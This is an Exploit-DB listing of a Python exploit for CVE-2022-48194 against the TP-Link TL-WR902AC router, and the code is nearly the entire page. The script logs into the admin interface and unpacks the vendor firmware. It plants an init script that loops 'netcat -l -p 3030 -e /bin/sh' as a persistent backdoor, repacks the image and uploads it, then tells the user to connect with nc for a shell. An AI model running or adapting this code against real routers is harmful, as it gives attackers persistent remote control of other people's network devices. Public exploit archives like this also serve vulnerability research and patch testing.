TP-Link TL-WR902AC firmware 210730 (V3) – Remote Code Execution (RCE) (Authenticated)

  • 作者: Tobias Müller
    日期: 2023-04-01
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/51192/
  • # !/usr/bin/python3
    
    # Exploit Title: TP-Link TL-WR902AC firmware 210730 (V3) - Remote Code Execution (RCE) (Authenticated)
    # Exploit Author: Tobias Müller
    # Date: 2022-12-01
    # Version: TL-WR902AC(EU)_V3_0.9.1 Build 220329
    # Vendor Homepage: https://www.tp-link.com/
    # Tested On: TP-Link TL-WR902AC
    # Vulnerability Description: Remote Code Execution via importing malicious firmware file
    # CVE: CVE-2022-48194
    # Technical Details: https://github.com/otsmr/internet-of-vulnerable-things
    
    TARGET_HOST = "192.168.0.1"
    ADMIN_PASSWORD = "admin"
    TP_LINK_FIRMWARE_DOWNLOAD = "https://static.tp-link.com/upload/firmware/2022/202208/20220803/TL-WR902AC(EU)_V3_220329.zip"
    
    
    import requests
    import os
    import glob
    import subprocess
    import base64, os, hashlib
    from Crypto.Cipher import AES, PKCS1_v1_5# pip install pycryptodome
    from Crypto.PublicKey import RSA
    from Crypto.Util.Padding import pad
    
    
    
    for program in ["binwalk", "fakeroot", "unsquashfs", "mksquashfs"]:
    if "not found" in subprocess.check_output(["which", program]).decode():
    print(f"[!] need {program} to run")
    exit(1)
    
    
    class WebClient(object):
    
    def __init__(self, host, password):
    
    self.host = "http://" + host
    self.password = password
    self.password_hash = hashlib.md5(('admin%s' % password.encode('utf-8')).encode('utf-8')).hexdigest()
    
    self.aes_key = "7765636728821987"
    self.aes_iv = "8775677306058909"
    
    self.session = requests.Session()
    
    crypto_data = self.cgi_basic("?8", "[/cgi/getParm#0,0,0,0,0,0#0,0,0,0,0,0]0,0\r\n").text
    
    self.sign_rsa_e = int(crypto_data.split("\n")[1].split('"')[1], 16)
    self.sign_rsa_n = int(crypto_data.split("\n")[2].split('"')[1], 16)
    self.seq= int(crypto_data.split("\n")[3].split('"')[1])
    
    self.jsessionid = self.get_jsessionid()
    
    
    def get_jsessionid(self):
    post_data = f"8\r\n[/cgi/login#0,0,0,0,0,0#0,0,0,0,0,0]0,2\r\nusername=admin\r\npassword={self.password}\r\n"
    self.get_encrypted_request_data(post_data, True)
    return self.session.cookies["JSESSIONID"]
    
    def aes_encrypt(self, aes_key, aes_iv, aes_block_size, plaintext):
    cipher = AES.new(aes_key.encode('utf-8'), AES.MODE_CBC, iv=aes_iv.encode('utf-8'))
    plaintext_padded = pad(plaintext, aes_block_size)
    return cipher.encrypt(plaintext_padded)
    
    def rsa_encrypt(self, n, e, plaintext):
    public_key = RSA.construct((n, e)).publickey()
    encryptor = PKCS1_v1_5.new(public_key)
    block_size = int(public_key.n.bit_length() / 8) - 11
    encrypted_text = ''
    for i in range(0, len(plaintext), block_size):
    encrypted_text += encryptor.encrypt(plaintext[i:i + block_size]).hex()
    return encrypted_text
    
    def get_encrypted_request_data(self, post_data, is_login: bool):
    
    encrypted_data = self.aes_encrypt(self.aes_key, self.aes_iv, AES.block_size, post_data.encode('utf-8'))
    encrypted_data = base64.b64encode(encrypted_data).decode()
    
    self.seq += len(encrypted_data)
    signature = f"h={self.password_hash}&s={self.seq}"
    if is_login:
    signature = f"key={self.aes_key}&iv={self.aes_iv}&" + signature
    
    encrypted_signature = self.rsa_encrypt(self.sign_rsa_n, self.sign_rsa_e, signature.encode('utf-8'))
    
    body = f"sign={encrypted_signature}\r\ndata={encrypted_data}\r\n"
    
    return self.cgi_basic("_gdpr", body)
    
    def cgi_basic(self, url: str, body: str):
    
    res = self.session.post(f"{self.host}/cgi{url}", data=body, headers={
    "Referer": "http://192.168.0.1/"
    })
    
    if res.status_code != 200:
    print(res.text)
    raise ValueError("router not reachable")
    
    return res
    
    
    def cmd(command):
    print("[*] running " + command)
    os.system(command)
    
    def build_backdoor():
    
    if os.path.isdir("./tp_tmp"):
    cmd("rm -r -f ./tp_tmp")
    
    os.mkdir("./tp_tmp")
    os.chdir('./tp_tmp')
    
    print("[*] downloading firmware")
    res = requests.get(TP_LINK_FIRMWARE_DOWNLOAD)
    with open("firmware.zip", "wb") as f:
    f.write(res.content)
    
    print("[*] downloading netcat")
    
    #res = requests.get(NETCAT_PRECOMPILED_FILE)
    #with open("netcat", "wb") as f:
    #f.write(res.content)
    
    if os.path.isfile("netcat"):
    print("[!] netcat not found")
    exit()
    
    cmd('unzip firmware.zip')
    filename = glob.glob("TL-*.bin")[0]
    cmd(f"mv '{filename}' firmware.bin")
    cmd('binwalk --dd=".*" firmware.bin')
    cmd('fakeroot -s f.dat unsquashfs -d squashfs-root _firmware.bin.extracted/160200')
    
    with open("./squashfs-root/etc/init.d/back", "w") as f:
    f.write("""
    #!/bin/sh
    while true;
    do
    netcat -l -p 3030 -e /bin/sh
    sleep 5
    done
    """)
    
    cmd("chmod +x ./squashfs-root/etc/init.d/back")
    
    with open("./squashfs-root/etc/init.d/rcS", "r+") as f:
    
    content = f.read()
    content = content.replace("cos &", "/etc/init.d/back &\ncos &")
    f.write(content)
    
    cmd("cp netcat ./squashfs-root/usr/bin/")
    cmd("chmod +x ./squashfs-root/usr/bin/netcat")
    
    cmd("fakeroot -i f.dat mksquashfs squashfs-root backdoor.squashfs -comp xz -b 262144")
    
    size = subprocess.check_output(["file", "backdoor.squashfs"]).decode()
    offset = int(size.split(" ")[9]) + 1442304
    cmd("dd if=firmware.bin of=backdoor.bin bs=1 count=1442304")
    cmd("dd if=backdoor.squashfs of=backdoor.bin bs=1 seek=1442304")
    cmd(f"dd if=firmware.bin of=backdoor.bin bs=1 seek={offset} skip={offset}")
    
    os.chdir('../')
    
    cmd(f"mv ./tp_tmp/backdoor.bin .")
    cmd("rm -r -f ./tp_tmp")
    
    def upload_backdoor():
    
    wc = WebClient(TARGET_HOST, ADMIN_PASSWORD)
    
    print("[*] uploading backdoor")
    
    files = {
    'filename': open('backdoor.bin','rb')
    }
    
    re_upload = requests.post("http://" + TARGET_HOST + "/cgi/softup", cookies={
    "JSESSIONID": wc.jsessionid
    }, headers={
    "Referer": "http://192.168.0.1/mainFrame.htm"
    }, files=files)
    
    if re_upload.status_code != 200 or "OK" not in re_upload.text:
    print("[!] error")
    exit(1)
    
    print("[*] success!")
    
    print("\nWait for router restart, then run:")
    print("nc 192.168.0.1 3030")
    
    
    build_backdoor()
    upload_backdoor()